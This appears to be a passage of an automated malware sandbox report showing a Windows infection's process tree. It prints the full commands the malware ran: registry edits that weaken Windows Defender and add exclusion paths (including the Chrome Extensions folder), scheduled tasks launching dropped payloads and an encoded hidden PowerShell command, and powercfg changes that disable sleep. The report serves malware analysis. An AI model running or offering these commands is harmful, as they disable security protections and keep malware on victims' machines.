              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              5⤵
                PID:484
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  6⤵
                    PID:2644
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      7⤵
                        PID:1168
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          8⤵
                            PID:1556
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                        6⤵
                          PID:1976
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            7⤵
                              PID:612
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                8⤵
                                  PID:2976
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                              6⤵
                                PID:2596
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  7⤵
                                    PID:2104
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      8⤵
                                        PID:2836
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    6⤵
                                      PID:1896
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                        7⤵
                                          PID:1428
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            8⤵
                                              PID:448
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          6⤵
                                            PID:2584
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              7⤵
                                                PID:2020
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                  8⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2360
                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                    9⤵
                                                      PID:916
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                              5⤵
                                                PID:960
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  6⤵
                                                    PID:1568
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1588
                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        8⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2304
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "bKPbLIPtdWjYWtgKbM" /SC once /ST 12:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\tdGatob.exe\" M5 /qtLdidrqEl 385135 /S" /V1 /F
                                                  5⤵
                                                  • Drops file in Windows directory
                                                  • Creates scheduled task(s)
                                                  PID:2948
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM"
                                                  5⤵
                                                    PID:2628
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM
                                                      6⤵
                                                        PID:1228
                                                        • \??\c:\windows\SysWOW64\schtasks.exe
                                                          schtasks /run /I /tn bKPbLIPtdWjYWtgKbM
                                                          7⤵
                                                            PID:3052
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 528
                                                        5⤵
                                                        • Program crash
                                                        PID:3028
                                                • C:\Users\Admin\Documents\SimpleAdobe\WdoPljIe63o_Dx5cgqx0qUJj.exe
                                                  C:\Users\Admin\Documents\SimpleAdobe\WdoPljIe63o_Dx5cgqx0qUJj.exe
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:268
                                                • C:\Users\Admin\Documents\SimpleAdobe\o63jYDiw5TeoTzs8xbiV0kUU.exe
                                                  C:\Users\Admin\Documents\SimpleAdobe\o63jYDiw5TeoTzs8xbiV0kUU.exe
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2764
                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                    3⤵
                                                      PID:2956
                                                • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
                                                  "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /svc
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Writes to the Master Boot Record (MBR)
                                                  • Modifies data under HKEY_USERS
                                                  PID:2792
                                                  • C:\Program Files (x86)\AVG\Browser\Update\Install\{D438D0B6-8669-4F6C-96C8-B6FB4EF57071}\AVGBrowserInstaller.exe
                                                    "C:\Program Files (x86)\AVG\Browser\Update\Install\{D438D0B6-8669-4F6C-96C8-B6FB4EF57071}\AVGBrowserInstaller.exe" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=iexplore --import-cookies --auto-launch-chrome --system-level
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2604
                                                    • C:\Program Files (x86)\AVG\Browser\Update\Install\{D438D0B6-8669-4F6C-96C8-B6FB4EF57071}\CR_EC514.tmp\setup.exe
                                                      "C:\Program Files (x86)\AVG\Browser\Update\Install\{D438D0B6-8669-4F6C-96C8-B6FB4EF57071}\CR_EC514.tmp\setup.exe" --install-archive="C:\Program Files (x86)\AVG\Browser\Update\Install\{D438D0B6-8669-4F6C-96C8-B6FB4EF57071}\CR_EC514.tmp\SECURE.PACKED.7Z" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=iexplore --import-cookies --auto-launch-chrome --system-level
                                                      3⤵
                                                      • Modifies Installed Components in the registry
                                                      • Executes dropped EXE
                                                      • Registers COM server for autorun
                                                      • Drops file in Program Files directory
                                                      • Modifies registry class
                                                      PID:2820
                                                      • C:\Program Files (x86)\AVG\Browser\Update\Install\{D438D0B6-8669-4F6C-96C8-B6FB4EF57071}\CR_EC514.tmp\setup.exe
                                                        "C:\Program Files (x86)\AVG\Browser\Update\Install\{D438D0B6-8669-4F6C-96C8-B6FB4EF57071}\CR_EC514.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=109.0.24111.121 --initial-client-data=0x14c,0x150,0x154,0x120,0x158,0x13ffa7c40,0x13ffa7c50,0x13ffa7c60
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:284
                                                  • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler.exe
                                                    "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2596
                                                  • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler64.exe
                                                    "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler64.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1964
                                                • C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
                                                  C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2152
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    2⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2916
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    2⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2688
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    2⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1372
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    2⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2708
                                                  • C:\Windows\system32\conhost.exe
                                                    C:\Windows\system32\conhost.exe
                                                    2⤵
                                                      PID:2072
                                                    • C:\Windows\system32\svchost.exe
                                                      svchost.exe
                                                      2⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2908
                                                  • C:\Windows\system32\taskeng.exe
                                                    taskeng.exe {D8E32320-3075-41A9-8D7E-64B127840623} S-1-5-18:NT AUTHORITY\System:Service:
                                                    1⤵
                                                      PID:2188
                                                      • C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\tdGatob.exe
                                                        C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\tdGatob.exe M5 /qtLdidrqEl 385135 /S
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops file in System32 directory
                                                        • Modifies data under HKEY_USERS
                                                        PID:2260
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                          3⤵
                                                            PID:2676
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                              4⤵
                                                                PID:836
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                  5⤵
                                                                    PID:1316
                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                      6⤵
                                                                        PID:2736
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                    4⤵
                                                                      PID:2448
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                        5⤵
                                                                          PID:2596
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                            6⤵
                                                                              PID:1976
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                          4⤵
                                                                            PID:2932
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                              5⤵
                                                                                PID:2856
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                  6⤵
                                                                                    PID:2500
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                4⤵
                                                                                  PID:1608
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:2468
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                          PID:3008
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                      4⤵
                                                                                        PID:2804
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          5⤵
                                                                                            PID:1372
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2788
                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                7⤵
                                                                                                  PID:1000
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "gumBqeSyY" /SC once /ST 02:13:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:1860
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn "gumBqeSyY"
                                                                                          3⤵
                                                                                            PID:2744
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "gumBqeSyY"
                                                                                            3⤵
                                                                                              PID:1156
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                              3⤵
                                                                                                PID:2468
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                  4⤵
                                                                                                    PID:2404
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2196
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                        6⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2688
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:2576
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:32
                                                                                                      4⤵
                                                                                                      • Windows security bypass
                                                                                                      PID:916
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:568
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2952
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:2824
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                            PID:1484
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:2884
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:64
                                                                                                              4⤵
                                                                                                                PID:2628
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /C copy nul "C:\Windows\Temp\jLjeNaiUMFXhhNbk\uPAlDUPK\JRuiVtDZkOfAqNJk.wsf"
                                                                                                              3⤵
                                                                                                                PID:3052
                                                                                                              • C:\Windows\SysWOW64\wscript.exe
                                                                                                                wscript "C:\Windows\Temp\jLjeNaiUMFXhhNbk\uPAlDUPK\JRuiVtDZkOfAqNJk.wsf"
                                                                                                                3⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:2992
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1208
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2356
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2780
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2436
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1724
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1020
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1932
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2584
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2012
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2644
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1612
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:680
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2748
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2324
